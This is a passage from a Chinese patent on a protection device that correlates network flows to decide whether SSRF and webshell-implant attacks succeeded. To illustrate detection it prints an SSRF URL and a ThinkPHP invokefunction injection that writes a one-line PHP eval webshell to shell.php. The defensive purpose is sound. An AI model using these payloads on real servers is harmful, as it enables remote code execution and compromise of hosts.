步骤S60防护设备对输入的数据流(即图2中的第一数据流)进行攻击检测,检测到SSRF攻击事件。
步骤S61防护设备对数据流进行解析,得到SSRF攻击报文的载荷内容。
步骤S62防护设备从载荷内容中提取攻击数据,解析攻击数据,提取SSRF内网URL。SRF内网URL是指攻击者指定被攻击主机访问的内网主机上资源的URL。
步骤S63防护设备关联SSRF攻击事件发生后的一段时间T内的数据流(同实例一,T的取值范围为[0,5min]),防护设备判断被攻击主机是否向SSRF内网URL发送请求,需要根据载荷中不同协议关联,如HTTP、HTTPS、文件(file)等。
步骤S64若关联到被攻击主机向SSRF内网URL发起请求的数据流(即图2中的第二数据流),则防护设备判定SSRF攻击事件为执行成功的攻击事件。
步骤S65若没有关联到符合上述关联条件的数据流,则防护设备判定SSRF攻击事件为执行失败的攻击事件。
上述流程示例说明如下。
在上述步骤S62中,防护设备从SSRF攻击报文的载荷内容中提取的攻击数据如下所示。
http://victim_server/index.php?param=http://localhost/admin.php
上述攻击数据的形式是一个URL,其中主机字段的内容包括victim_server,参数字段的内容包括http://localhost/admin.php。上述URL的含义是攻击者请求被攻击主机victim_server去访问内网主机localhost上文件admin.php。防护设备从以上攻击数据中提取到的SSRF内网URL为:http://localhost/admin.php。
在上述步骤S63中,若在上述攻击发生后的流量中,防护设备发现有一条数据流中包含被攻击主机向内网URLhttp://localhost/admin.php发送了请求,无论是否建立连接,都说明被攻击主机成功执行了攻击数据,则防护设备判定SSRF攻击事件为执行成功的攻击事件。
实例四
实例四是对附图2所示方法的举例说明。在实例四提供的方法中,附图2中检测的攻击事件为Webshell植入攻击事件。Webshell植入攻击成功判定如图7所示,包括以下步骤S70至步骤S75。
步骤S70防护设备对输入的数据流(即图2中的第一数据流)进行攻击检测,检测到Webshell植入攻击事件。
步骤S71防护设备对数据流进行解析,得到Webshell植入攻击报文的载荷内容。
步骤S72防护设备从载荷内容中提取攻击数据,解析攻击数据,提取植入的Webshell文件的文件名。
步骤S73防护设备关联Webshell植入事件发生后一段时间T内,是否存在外部主机成功访问Webshell文件的行为,T的取值范围为[0,30min]。
T取值范围说明:不同于实例一、实例二、实例三,Webshell植入事件发生后是否发生外部主机访问Webshell文件的行为,取决于攻击者的攻击行为。因此,这种场景下的时间T的范围应大于实例一、实例二、实例三中的时间T。为增加关联成功率并兼顾性能问题,在实例四设置更长的时间窗口[0,30min]。
步骤S74若关联到一条存在访问Webshell文件成功的事件的数据流(即图2中的第二数据流),则防护设备判定Webshell植入事件为执行成功的攻击事件。
步骤S75若没有关联到访问Webshell文件成功的事件,防护设备判定Webshell植入事件为执行失败的攻击事件。
上述流程示例说明如下。
在上述步骤S72中,防护设备从Webshell植入攻击报文的载荷内容中提取的攻击数据如下所示。
/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php@eval($_POST['pass']);?>
上述攻击数据通过注入方式创建一句话木马。若执行成功,被攻击主机将创建Webshell文件shell.php。
在上述步骤S72中,防护设备从以上攻击数据提取的Webshell文件的文件名为shell.php。
在上述步骤S74中,若在上述攻击发生后的流量中,防护设备发现有一条数据流中包含存在外部主机请求访问被攻击主机上的shell.php并且访问成功,说明被攻击主机成功执行了上述攻击数据,并且在本地创建了shell.php文件,则防护设备判定Webshell植入攻击事件为执行成功的攻击事件。
以上介绍了如何识别Webshell植入攻击成功的整体流程,上述攻击成功的识别流程中涉及如何判断Webshell文件是否访问成功。如果Webshell文件访问成功,证明Webshell植入事件是执行成功的攻击事件。如果只发生了尝试访问Webshell文件的动作,并不能证明Webshell植入事件是执行成功的攻击事件。
下面对如何判定Webshell文件访问成功做具体说明,访问成功判定过程包括以下步骤一至步骤三。
步骤一、攻击主机IP_Attacker1向被攻击主机IP_Victim发送木马植入攻击数据。木马植入攻击数据用于向被攻击主机IP_Victim植入Webshell文件形式的木马。木马植入攻击数据如以下所示。
/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php@eval($_POST['pass']);?>
其中,shell.php是木马文件的文件名,<?php@eval($_POST['pass']);?>为一句话木马的内容。上述木马植入攻击数据的攻击原理是通过命令注入漏洞向被攻击主机植入一句话木马,若执行成功,将在被攻击主机创建Webshell文件shell.php。
其中,一句话木马是一种木马。具体地,一般根据木马内容长度,将木马分为一句话木马、小马、大马。一句话木马指只有一行代码的木马,内容很简洁。
步骤二、攻击主机IP_Attacker1尝试植入木马文件后,攻击者IP_Attacker2尝试访问植入的木马文件shell.php。若攻击者IP_Attacker2能访问成功,则证明步骤一中的植入动作执行成功。
其中,IP_Attacker2与IP_Attacker1可能为同一主机,也可能为不同主机。
步骤三、防护设备识别步骤二中连接木马文件是否成功。防护设备识别连接木马文件是否成功例如采用下述两种实现方式。
第一种方式、被攻击主机接收到上述步骤二中针对木马文件访问请求之后,被攻击主机会生成并返回响应报文。防护设备获取被攻击主机的响应报文,判断响应报文是否包含指定特征。如果响应报文包含指定特征,防护设备确定木马文件访问成功。
其中,该指定特征也称木马连接成功后回显标记特征。指定特征例如是一个字符串。
举个具体的例子,攻击者IP_Attacker2向被攻击主机发送访问木马文件shell.php的HTTP请求报文。HTTP请求报文中请求行表示尝试连接木马文件shell.php。
比如,请求行的内容为:post/shell.php HTTP/1.1。其中各个字段的含义分别是,post表示请求方法是post,shell.php表示请求的URL是shell.php,HTTP/1.1表示协议版本是HTTP1.1。
被攻击主机接收HTTP请求报文,生成并返回HTTP响应报文。防护设备获取HTTP响应报文,提取响应体的内容。如果HTTP响应报文中响应体的开始位置包括字符串”->|”,防护设备确定木马文件shell.php访问成功。其中,字符串”->|”是对访问成功情况下响应报文中指定特征的举例说明。字符串”->|”存在于多数一句话木马中,如菜刀、XISE等攻击工具所使用的一句话木马。
第二种方式、被攻击主机接收到上述步骤二中针对木马文件访问请求之后,被攻击主机会生成并返回响应报文。防护设备获取被攻击主机的响应报文,判断响应报文是否包含控制命令的执行结果。如果响应报文包含控制命令的执行结果,防护设备确定木马文件访问成功。
其中,控制命令用于指示被攻击主机执行对应的操作。在一种可能的实现中,防护设备对上述步骤二中针对木马文件访问请求进行解析,从木马文件访问请求的载荷内容中获得攻击者的控制命令。
举一个具体的控制命令的例子,比如木马文件访问请求包含的控制命令是id命令,id命令用于获取用户的ID和群组的ID等信息。如果响应报文包括被攻击主机相关用户的ID信息,防护设备确定木马文件访问成功。
例如,攻击者IP_Attacker2向被攻击主机发送访问木马文件shell.php的HTTP请求报文。HTTP请求报文中请求行表示尝试连接木马文件shell.php。例如,HTTP请求报文中请求行包含:post/shell.php HTTP/1.1。HTTP请求报文的请求数据经过解析后包含待执行的命令:id。被攻击主机针对该HTTP请求报文返回了HTTP响应报文。防护设备通过攻击者IP_Attacker2的HTTP请求报文,检测到攻击者IP_Attacker2访问shell.php的动作之后,通过被攻击主机HTTP响应报文中响应体的内容来判断id命令是否执行成功。比如,被攻击主机返回的HTTP响应报文中的响应体的内容包括:uid=0(root)gid=0(root)groups=0(root),这一内容的含义是root用户在Linux平台执行id命令的执行结果,防护设备发现HTTP响应报文包括这一内容 时,确定HTTP请求报文中id命令执行成功,即攻击者IP_Attacker2与被攻击主机上的木马文件shell.php成功进行了通信交互。
相比第一种方式,第二种方式更加通用。攻击者植入木马文件并且连接成功后,会发送相关指令来执行后续操作,这种方法就是判定攻击者发送的命令在被攻击主机上是否执行成功。如果命令执行成功,则说明成功连接到木马文件并建立通信,从而说明最初的木马植入攻击事件是执行成功的事件。
总结来看,上述两种实现方式本质上可以归纳为一种方法,即基于一个数据流的攻击成功判定,主要依赖的数据是被攻击主机响应内容。第一种实现方式基于特定Webshell文件连接后特定的回显特征进行判定,第二种实现方式基于攻击者命令执行结果进行判定。
通过上述各个实施例提供的方法,有助于从海量安全事件中筛选出高价值的攻击成功事件,帮助运维人员及时发现被攻陷资产,优先处置攻击成功的高危事件。此外,无需终端侧数据采集关联分析,可落地性强。
本实施例提供的方法不限于上述四个实例中说明的反弹shell场景、外发请求场景、SSRF场景、Webshell植入场景等,只要通过多流关联识别攻击成功的方案,皆在本申请实施例保护范围内。此外,上述四个实例中时间窗口T的取值仅为实施参考值,只要思路与本实施例相同,T取值不同于实施例中的参考值,亦在本实施例保护范围内。
下面对防护设备的基本硬件结构举例说明。
附图8是本申请实施例提供的一种防护设备的结构示意图。附图8所示的防护设备800用于实施上述附图2、附图3、附图4、附图5、附图6或者附图7描述的攻击成功识别方法。
可选地,结合附图1来看,附图8所示的防护设备800是附图1中的防火墙、探针或者安全分析设备中的一种设备;或者,附图8所示的防护设备800是附图1中的防火墙、探针以及安全分析设备中两种或两种以上设备的集成设备,例如附图8中的防护设备800是集群计算机,附图8中的处理器801、处理器805、网络接口804等分布在不同计算机上。
可选地,结合附图2来看,附图8所示的防护设备800是附图2中的防护设备。
防护设备800包括至少一个处理器801、通信总线802、存储器803以及至少一个网络接口804。
处理器801例如是通用中央处理器(central processing unit,CPU)、网络处理器(network processer,NP)、图形处理器(graphics processing unit,GPU)、神经网络处理器(neural-network processing units,NPU)、数据处理单元(data processing unit,DPU)、微处理器或者一个或多个用于实现本申请方案的集成电路。例如,处理器801包括专用集成电路(application-specific integrated circuit,ASIC),可编程逻辑器件(programmable logic device,PLD)或其组合。PLD例如是复杂可编程逻辑器件(complex programmable logic device,CPLD)、现场可编程逻辑门阵列(field-programmable gate array,FPGA)、通用阵列逻辑(generic array logic,GAL)或其任意组合。
可选地,处理器801通过读取存储器803中保存的程序代码810实现上述实施例中的方法,或者,处理器801通过内部存储的程序代码实现上述实施例中的方法。在处理器801通过读取存储器803中保存的程序代码810实现上述实施例中的方法的情况下,存储器803中 保存实现本申请实施例提供的攻击成功识别方法的程序代码。
存储器803中存储的程序代码810被至少一个处理器801读取后,防护设备800执行以下操作:对通过网络接口804获取的第一数据流进行攻击检测;若在第一数据流中检测到攻击事件,从第一数据流的载荷内容中提取攻击数据;从第一数据流的报文头获得被攻击主机的标识;通过网络接口804获取第二数据流,第二数据流是第一数据流中的攻击事件发生之后传输的数据流;根据攻击数据以及被攻击主机的标识,检测第二数据流与第一数据流是否满足关联条件;如果第二数据流与第一数据流满足关联条件,确定攻击事件为执行成功的攻击事件。
网络接口804用于接收数据流,如上述第一数据流以及第二数据流。网络接口804使用任何收发器一类的装置,用于与其它设备或通信网络通信。网络接口804包括有线网络接口,可选地还包括无线网络接口。其中,有线网络接口例如可以为以太网接口。以太网接口可以是光接口,电接口或其组合。无线网络接口可以为无线局域网(wireless local area networks,WLAN)接口,蜂窝网络接口或其组合等。
存储器803用于存储网络接口804接收的数据流。存储器803例如是只读存储器(read-only memory,ROM)或可存储静态信息和指令的其它类型的静态存储设备,又如是随机存取存储器(random access memory,RAM)或者可存储信息和指令的其它类型的动态存储设备,又如是电可擦可编程只读存储器(electrically erasable programmable read-only Memory,EEPROM)、只读光盘(compact disc read-only memory,CD-ROM)或其它光盘存储、光碟存储(包括压缩光碟、激光碟、光碟、数字通用光碟、蓝光光碟等)、磁盘存储介质或者其它磁存储设备,或者是能够用于携带或存储具有指令或数据结构形式的期望的程序代码并能够由计算机存取的任何其它介质,但不限于此。存储器803例如是独立存在,并通过通信总线802与处理器801相连接。存储器803也可以和处理器801集成在一起。
通信总线802用于在上述组件之间传送信息。通信总线802可以分为地址总线、数据总线、控制总线等。为便于表示,附图8中仅用一条粗线表示,但并不表示仅有一根总线或一种类型的总线。
在具体实现中,作为一种实施例,处理器801可选地包括一个或多个CPU,如附图8中所示的CPU0和CPU1。
在一些实施例中,防护设备800还包括输出设备和输入设备。
输入设备用于接收用户的检测需求(例如检测指定协议的数据流,指定网段的数据流)。输入设备和处理器801通信,可选地以多种方式接收用户的输入。例如,输入设备可选地是鼠标、键盘、触摸屏设备或传感设备等。
输出设备和处理器801通信。输出设备用于输出处理器801的检测结果(即攻击事件是否为执行成功的攻击事件)。输出设备可选地以多种方式来显示信息。例如,输出设备可选地是液晶显示器(liquid crystal display,LCD)、发光二级管(light emitting diode,LED)显示设备、阴极射线管(cathode ray tube,CRT)显示设备或投影仪(projector)等。输出设备和处理器801通信,可以以多种方式来显示信息。例如,输出设备可以是液晶显示器(liquid crystal display,LCD)、发光二级管(light emitting diode,LED)显示设备、阴极射线管(cathode ray tube,CRT)显示设备或投影仪(projector)等。
处理器801实现上述功能的更多细节请参考前面各个方法实施例中的描述,在这里不再 重复。
本申请实施例提供的防护设备800用于执行上述各个方法实施例提供的攻击成功识别方法。由于防护设备800利用多流关联的机制判定是否攻击成功,能够解决服务端无回显或响应内容中不包含攻击数据的执行结果的场景如何攻击成功判定的问题。
附图9是本申请实施例提供的一种攻击成功识别装置900的结构示意图。附图9所示的攻击成功识别装置900例如实现图2中防护设备的功能。
请参考附图9,攻击成功识别装置900包括检测单元901、处理单元902和获取单元903。检测单元901用于支持攻击成功识别装置900执行步骤S201。处理单元902用于支持攻击成功识别装置900执行步骤S202、步骤S203、步骤S205和步骤S206。获取单元903用于支持攻击成功识别装置900执行步骤S204。
攻击成功识别装置900中的各个单元全部或部分地通过软件、硬件、固件或者其任意组合来实现。攻击成功识别装置900中的各个单元用于执行上述图2中防护设备的相应功能。
附图9所描述的装置实施例仅仅是示意性的,例如,上述单元的划分,仅仅为一种逻辑功能划分,实际实现时可以有另外的划分方式,例如多个单元或组件可以结合或者可以集成到另一个系统,或一些特征可以忽略,或不执行。在本申请各个实施例中的各功能单元可以集成在一个处理单元中,也可以是各个单元单独物理存在,也可以两个或两个以上单元集成在一个单元中。附图9中上述各个单元既可以采用硬件的形式实现,也可以采用软件功能单元的形式实现。例如,采用软件实现时,上述检测单元901和处理单元902可以是由附图8中的至少一个处理器801读取存储器803中存储的程序代码后,生成的软件功能单元来实现。附图9中上述各个单元也可以由防护设备中的不同硬件分别实现,例如检测单元901由附图8中的至少一个处理器801中的一部分处理资源(例如多核处理器中的一个核或两个核)实现,而处理单元902由附图8中至少一个处理器801中的其余部分处理资源(例如多核处理器中的其他核),或者采用现场可编程门阵列(field-programmable gate array,FPGA)、或协处理器等可编程器件来完成。获取单元903由附图8中的网络接口804实现。显然上述功能单元也可以采用软件硬件相结合的方式来实现,例如检测单元901由硬件可编程器件实现,而处理单元902是由CPU读取存储器中存储的程序代码后,生成的软件功能单元。
在一些实施例中,提供了一种芯片,包括存储器和处理器,存储器用于存储计算机指令,处理器用于从存储器中调用并运行该计算机指令,以执行上述各个方法实施例中的方法。
本申请实施例的说明书和权利要求书中的术语“第一”和“第二”等是用于区别不同的对象,而不是用于描述对象的特定顺序,也不能理解为指示或暗示相对重要性。例如,第一数据流和第二数据流用于区别不同的数据流,而不是用于描述数据流的特定顺序,也不能理解为第一数据流比第二数据流更重要。
A参考B,指的是A与B相同或者A为B的简单变形。
本说明书中的各个实施例均采用递进的方式描述,各个实施例之间相同相似的部分可互相参考,每个实施例重点说明的都是与其他实施例的不同之处。
在上述实施例中,可以全部或部分地通过软件、硬件、固件或者其任意组合来实现。当使用软件实现时,可以全部或部分地以计算机程序产品的形式实现。计算机程序产品包括一 个或多个计算机指令。在计算机上加载和执行计算机程序指令时,全部或部分地产生按照本申请实施例描述的流程或功能。计算机可以是通用计算机、专用计算机、计算机网络、或者其他可编程装置。计算机指令可以存储在计算机可读存储介质中,或者从一个计算机可读存储介质向另一个计算机可读存储介质传输,例如,计算机指令可以从一个网站站点、计算机、服务器或数据中心通过有线(例如同轴电缆、光纤、数字用户线(DSL))或无线(例如红外、无线、微波等)方式向另一个网站站点、计算机、服务器或数据中心进行传输。计算机可读存储介质可以是计算机能够存取的任何可用介质或者是包含一个或多个可用介质集成的服务器、数据中心等数据存储设备。可用介质可以是磁性介质,(例如,软盘、硬盘、磁带)、光介质(例如,DVD)、或者半导体介质(例如固态硬盘Solid State Disk(SSD))等。
以上实施例仅用以说明本申请的技术方案,而非对其限制;尽管参照前述实施例对本申请进行了详细的说明,本领域的普通技术人员应当理解:其依然可以对前述各实施例所记载的技术方案进行修改,或者对其中部分技术特征进行等同替换;而这些修改或者替换,并不使相应技术方案的本质脱离本申请各实施例技术方案的范围。

Claims (24)

  1. 一种攻击成功识别方法,其特征在于,所述方法包括:
    对第一数据流进行攻击检测;
    若在所述第一数据流中检测到攻击事件,从所述第一数据流的载荷内容中提取攻击数据;
    从所述第一数据流的报文头获得被攻击主机的标识;
    获取第二数据流,所述第二数据流是所述第一数据流中的攻击事件发生之后传输的数据流;
    根据所述攻击数据以及所述被攻击主机的标识,检测所述第二数据流与所述第一数据流是否满足关联条件;
    如果所述第二数据流与所述第一数据流满足所述关联条件,确定所述攻击事件为执行成功的攻击事件。
  2. 根据权利要求1所述的方法,其特征在于,所述第二数据流与所述第一数据流的传输时间间隔小于或小于等于时间窗口。
  3. 根据权利要求1所述的方法,其特征在于,所述被攻击主机的标识是根据所述第一数据流响应方的目的地址信息确定的,所述被攻击主机位于局域网中,所述第一数据流是位于互联网中的攻击主机向所述被攻击主机发起的。
  4. 根据权利要求1所述的方法,其特征在于,所述攻击数据包括指定对象的标识。
  5. 根据权利要求4所述的方法,其特征在于,所述指定对象为指定主机,所述指定对象的标识为所述指定主机的地址;或者,
    所述指定对象为所述被攻击主机上保存的指定文件,所述指定对象的标识为所述指定文件的标识;或者,
    所述指定对象为指定资源,所述指定资源的标识为所述指定资源的定位符;或者,
    所述指定对象为指定端口,所述指定对象的标识为所述指定端口的端口号。
  6. 根据权利要求5所述的方法,其特征在于,所述攻击事件包括反弹壳shell攻击,所述指定主机为反弹shell的控制端,所述攻击数据中指定主机的地址为反弹shell的控制端的地址,所述反弹shell攻击为所述被攻击主机向所述控制端发送请求从而发起的攻击。
  7. 根据权利要求6所述的方法,其特征在于,所述被攻击主机的标识包括所述被攻击主机的IP地址,所述第二数据流与所述第一数据流满足所述关联条件,包括:
    所述第二数据流的发起方互联网协议IP地址包括所述被攻击主机的IP地址,且所述第二数据流的响应方的地址为所述反弹shell的控制端的地址。
  8. 根据权利要求5所述的方法,其特征在于,所述攻击事件包括外发请求攻击,所述攻击数据包括互联网中指定主机上资源的定位符,所述外发请求攻击为所述被攻击主机请求所述互联网中指定主机上资源从而发起的攻击。
  9. 根据权利要求8所述的方法,其特征在于,所述第二数据流与所述第一数据流满足所述关联条件,包括:
    所述第二数据流的发起方的IP地址包括所述被攻击主机的IP地址,且所述第二数据流包括所述互联网中指定主机上资源的定位符,且所述第二数据流所基于的协议为所述第一数据流的载荷使用的协议。
  10. 根据权利要求5所述的方法,其特征在于,所述攻击事件包括服务器端请求伪造SSRF攻击,所述攻击数据包括局域网中指定主机上资源的定位符,所述SSRF攻击为所述被攻击主机请求所述局域网中指定主机上资源从而发起的攻击。
  11. 根据权利要求10所述的方法,其特征在于,所述被攻击主机的标识包括所述被攻击主机的IP地址,所述第二数据流与所述第一数据流满足所述关联条件,包括:
    所述第二数据流的发起方IP地址包括所述被攻击主机的IP地址,且所述第二数据流包括所述局域网中指定主机上资源的定位符,且所述第二数据流所基于的协议为所述第一数据流的载荷使用的协议。
  12. 根据权利要求5所述的方法,其特征在于,所述攻击事件包括文件植入攻击,所述指定文件为木马文件,所述攻击数据中所述指定文件的标识为被攻击主机上所述木马文件的文件名,所述文件植入攻击为通过向所述被攻击主机植入木马文件而发起的攻击。
  13. 根据权利要求12所述的方法,其特征在于,所述被攻击主机的标识包括所述被攻击主机的IP地址,所述第二数据流与所述第一数据流满足所述关联条件,包括:
    所述第二数据流的响应方地址包括所述被攻击主机的IP地址,且所述第二数据流包括针对所述木马文件的访问成功请求。
  14. 一种攻击成功识别装置,其特征在于,包括:检测单元、处理单元以及获取单元;
    所述检测单元,用于对第一数据流进行攻击检测;
    若所述检测单元在所述第一数据流中检测到攻击事件,所述处理单元,用于从所述第一数据流的载荷内容中提取攻击数据,以及从所述第一数据流的报文头获得被攻击主机的标识;
    所述获取单元,用于获取第二数据流,所述第二数据流是所述第一数据流中的攻击事件发生之后传输的数据流;
    所述处理单元,还用于根据所述攻击数据以及所述被攻击主机的标识,检测所述第二数据流与所述第一数据流是否满足关联条件,如果所述第二数据流与所述第一数据流满足所述关联条件,确定所述攻击事件为执行成功的攻击事件。
  15. 一种防护设备,其特征在于,包括存储器、网络接口和至少一个处理器;
    所述存储器用于存储程序代码;
    所述至少一个处理器,用于读取所述存储器中存储的程序代码后,执行以下操作:
    对通过所述网络接口获取的第一数据流进行攻击检测;
    若在所述第一数据流中检测到攻击事件,从所述第一数据流的载荷内容中提取攻击数据;
    从所述第一数据流的报文头获得被攻击主机的标识;
    通过所述网络接口获取第二数据流,所述第二数据流是所述第一数据流中的攻击事件发生之后传输的数据流;
    根据所述攻击数据以及所述被攻击主机的标识,检测所述第二数据流与所述第一数据流是否满足关联条件;
    如果所述第二数据流与所述第一数据流满足所述关联条件,确定所述攻击事件为执行成功的攻击事件。
  16. 根据权利要求15所述的防护设备,其特征在于,所述被攻击主机的标识是根据所述第一数据流响应方的目的地址信息确定的,所述被攻击主机位于局域网中,所述第一数据流是位于互联网中的攻击主机向所述被攻击主机发起的。
  17. 根据权利要求15所述的防护设备,其特征在于,所述攻击数据包括指定对象的标识,所述指定对象为指定主机,所述指定对象的标识为所述指定主机的地址;或者,
    所述指定对象为所述被攻击主机上保存的指定文件,所述指定对象的标识为所述指定文件的标识;或者,
    所述指定对象为指定资源,所述指定资源的标识为所述指定资源的定位符;或者,
    所述指定对象为指定端口,所述指定对象的标识为所述指定端口的端口号。
  18. 根据权利要求17所述的防护设备,其特征在于,所述攻击事件包括反弹壳shell攻击,所述指定主机为反弹shell的控制端,所述攻击数据中指定主机的地址为反弹shell的控制端的地址,所述反弹shell攻击为所述被攻击主机向所述控制端发送请求从而发起的攻击。
  19. 根据权利要求17所述的防护设备,其特征在于,所述攻击事件包括外发请求攻击,所述攻击数据包括互联网中指定主机上资源的定位符,所述外发请求攻击为所述被攻击主机请求所述互联网中指定主机上资源从而发起的攻击。
  20. 根据权利要求17所述的防护设备,其特征在于,所述攻击事件包括服务器端请求伪造SSRF攻击,所述攻击数据包括局域网中指定主机上资源的定位符,所述SSRF攻击为所述被攻击主机请求所述局域网中指定主机上资源从而发起的攻击。
  21. 根据权利要求17所述的防护设备,其特征在于,所述攻击事件包括文件植入攻击,所述指定文件为木马文件,所述攻击数据中所述指定文件的标识为被攻击主机上所述木马文件的文件名,所述文件植入攻击为通过向所述被攻击主机植入木马文件而发起的攻击。
  22. 一种计算机程序产品,其特征在于,所述计算机程序产品包括一个或多个计算机程序指令,当所述计算机程序指令被计算机加载并运行时,使得所述计算机执行权利要求1至13中任意一项所述的攻击成功识别方法。
  23. 一种防护系统,其特征在于,包括存储器、网络接口和至少一个处理器;
    所述存储器用于存储程序代码;
    所述至少一个处理器,用于读取所述存储器中存储的程序代码后,执行以下操作:
    对通过所述网络接口获取的第一数据流进行攻击检测;
    若在所述第一数据流中检测到攻击事件,从所述第一数据流的载荷内容中提取攻击数据;
    从所述第一数据流的报文头获得被攻击主机的标识;
    通过所述网络接口获取第二数据流,所述第二数据流是所述第一数据流中的攻击事件发生之后传输的数据流;
    根据所述攻击数据以及所述被攻击主机的标识,检测所述第二数据流与所述第一数据流是否满足关联条件;
    如果所述第二数据流与所述第一数据流满足所述关联条件,确定所述攻击事件为执行成功的攻击事件。
  24. 一种计算机可读存储介质,其特征在于,所述存储介质中存储有至少一条指令,所述指令在计算机上运行时,使得计算机执行如权利要求1至13中任意一项所述的攻击成功识别方法。
PCT/CN2021/112867 2021-01-21 2021-08-16 攻击成功识别方法及防护设备 Ceased WO2022156197A1 (zh)

Priority Applications (2)

Application Number Priority Date Filing Date Title
EP21920577.0A EP4270907A4 (en) 2021-01-21 2021-08-16 METHOD FOR IDENTIFYING THE SUCCESS OF AN ATTACK AND PROTECTION DEVICE
US18/355,576 US20230370482A1 (en) 2021-01-21 2023-07-20 Method for identifying successful attack and protection device

Applications Claiming Priority (2)

Application Number Priority Date Filing Date Title
CN202110084243.8 2021-01-21
CN202110084243.8A CN114884684A (zh) 2021-01-21 2021-01-21 攻击成功识别方法及防护设备

Related Child Applications (1)

Application Number Title Priority Date Filing Date
US18/355,576 Continuation US20230370482A1 (en) 2021-01-21 2023-07-20 Method for identifying successful attack and protection device

Publications (1)

Publication Number Publication Date
WO2022156197A1 true WO2022156197A1 (zh) 2022-07-28

Family

ID=82549344

Family Applications (1)

Application Number Title Priority Date Filing Date
PCT/CN2021/112867 Ceased WO2022156197A1 (zh) 2021-01-21 2021-08-16 攻击成功识别方法及防护设备

Country Status (4)

Country Link
US (1) US20230370482A1 (zh)
EP (1) EP4270907A4 (zh)
CN (1) CN114884684A (zh)
WO (1) WO2022156197A1 (zh)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115442109A (zh) * 2022-08-31 2022-12-06 北京天融信网络安全技术有限公司 网络攻击结果的确定方法、装置、设备及存储介质

Families Citing this family (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2022249416A1 (ja) * 2021-05-27 2022-12-01 日本電信電話株式会社 分析装置、分析方法、および、分析システム
CN116015761B (zh) * 2022-12-09 2025-11-14 杭州麦唐科技有限公司 车联网通信数据的安全检测方法、装置、设备和存储介质
US12483573B2 (en) * 2023-01-19 2025-11-25 Palo Alto Networks, Inc. Detecting scanning and attacking uniform resource locators in network traffic

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20180183831A1 (en) * 2016-12-28 2018-06-28 T-Mobile, Usa, Inc. REAL-TIME POLICY FILTERING OF DENIAL OF SERVICE (DoS) INTERNET PROTOCOL (IP) ATTACKS AND MALICIOUS TRAFFIC
US20200036736A1 (en) * 2018-07-26 2020-01-30 Wallarm, Inc. Targeted attacks detection system
CN111049782A (zh) * 2018-10-12 2020-04-21 北京奇虎科技有限公司 反弹式网络攻击的防护方法、装置、设备、系统
CN111049781A (zh) * 2018-10-12 2020-04-21 北京奇虎科技有限公司 一种反弹式网络攻击的检测方法、装置、设备及存储介质
CN111901306A (zh) * 2020-06-29 2020-11-06 苏州浪潮智能科技有限公司 一种检测和阻断反弹shell攻击的方法及相关设备

Family Cites Families (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20110213869A1 (en) * 2000-09-25 2011-09-01 Yevgeny Korsunsky Processing data flows with a data flow processor
US10313372B2 (en) * 2015-03-02 2019-06-04 David Paul Heilig Identifying malware-infected network devices through traffic monitoring
KR102231726B1 (ko) * 2019-03-28 2021-03-25 네이버클라우드 주식회사 취약점 진단방법 및 이를 위한 진단장치
US11431734B2 (en) * 2019-04-18 2022-08-30 Kyndryl, Inc. Adaptive rule generation for security event correlation
US11271907B2 (en) * 2019-12-19 2022-03-08 Palo Alto Networks, Inc. Smart proxy for a large scale high-interaction honeypot farm

Patent Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20180183831A1 (en) * 2016-12-28 2018-06-28 T-Mobile, Usa, Inc. REAL-TIME POLICY FILTERING OF DENIAL OF SERVICE (DoS) INTERNET PROTOCOL (IP) ATTACKS AND MALICIOUS TRAFFIC
US20200036736A1 (en) * 2018-07-26 2020-01-30 Wallarm, Inc. Targeted attacks detection system
CN111049782A (zh) * 2018-10-12 2020-04-21 北京奇虎科技有限公司 反弹式网络攻击的防护方法、装置、设备、系统
CN111049781A (zh) * 2018-10-12 2020-04-21 北京奇虎科技有限公司 一种反弹式网络攻击的检测方法、装置、设备及存储介质
CN111901306A (zh) * 2020-06-29 2020-11-06 苏州浪潮智能科技有限公司 一种检测和阻断反弹shell攻击的方法及相关设备

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
See also references of EP4270907A4

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115442109A (zh) * 2022-08-31 2022-12-06 北京天融信网络安全技术有限公司 网络攻击结果的确定方法、装置、设备及存储介质

Also Published As

Publication number Publication date
US20230370482A1 (en) 2023-11-16
EP4270907A4 (en) 2024-04-03
CN114884684A (zh) 2022-08-09
EP4270907A1 (en) 2023-11-01

Similar Documents

Publication Publication Date Title
CN112383546B (zh) 一种处理网络攻击行为的方法、相关设备及存储介质
JP7388613B2 (ja) パケット処理方法及び装置、デバイス、並びに、コンピュータ可読ストレージ媒体
Ndatinya et al. Network forensics analysis using Wireshark
US10200384B1 (en) Distributed systems and methods for automatically detecting unknown bots and botnets
US10193911B2 (en) Techniques for automatically mitigating denial of service attacks via attack pattern matching
US10581880B2 (en) System and method for generating rules for attack detection feedback system
US9954878B2 (en) Multi-factor deception management and detection for malicious actions in a computer network
US10567431B2 (en) Emulating shellcode attacks
US20210152598A1 (en) Network application firewall
US20230370482A1 (en) Method for identifying successful attack and protection device
US9356950B2 (en) Evaluating URLS for malicious content
US20120255022A1 (en) Systems and methods for determining vulnerability to session stealing
CN103297433B (zh) 基于网络数据流的http僵尸网络检测方法及系统
CN110209583A (zh) 安全测试方法、装置、系统、设备和存储介质
CN110730175A (zh) 一种基于威胁情报的僵尸网络检测方法及检测系统
US12561344B2 (en) Classification including correlation
CN103607385A (zh) 基于浏览器进行安全检测的方法和装置
WO2023116045A1 (zh) 攻击成功识别方法及防护系统
CN110348210B (zh) 安全防护方法及装置
US11632393B2 (en) Detecting and mitigating malware by evaluating HTTP errors
CN107360198B (zh) 可疑域名检测方法及系统
Martin et al. Raspberry Pi Malware: An analysis of cyberattacks towards IoT devices
WO2022166166A1 (zh) 安全组件的功能验证方法及装置
CN114124585B (zh) 一种安全防御方法、装置、电子设备及介质
CN102098285A (zh) 一种防范钓鱼攻击的方法及装置

Legal Events

Date Code Title Description
ENP Entry into the national phase

Ref document number: 2021920577

Country of ref document: EP

Effective date: 20230726

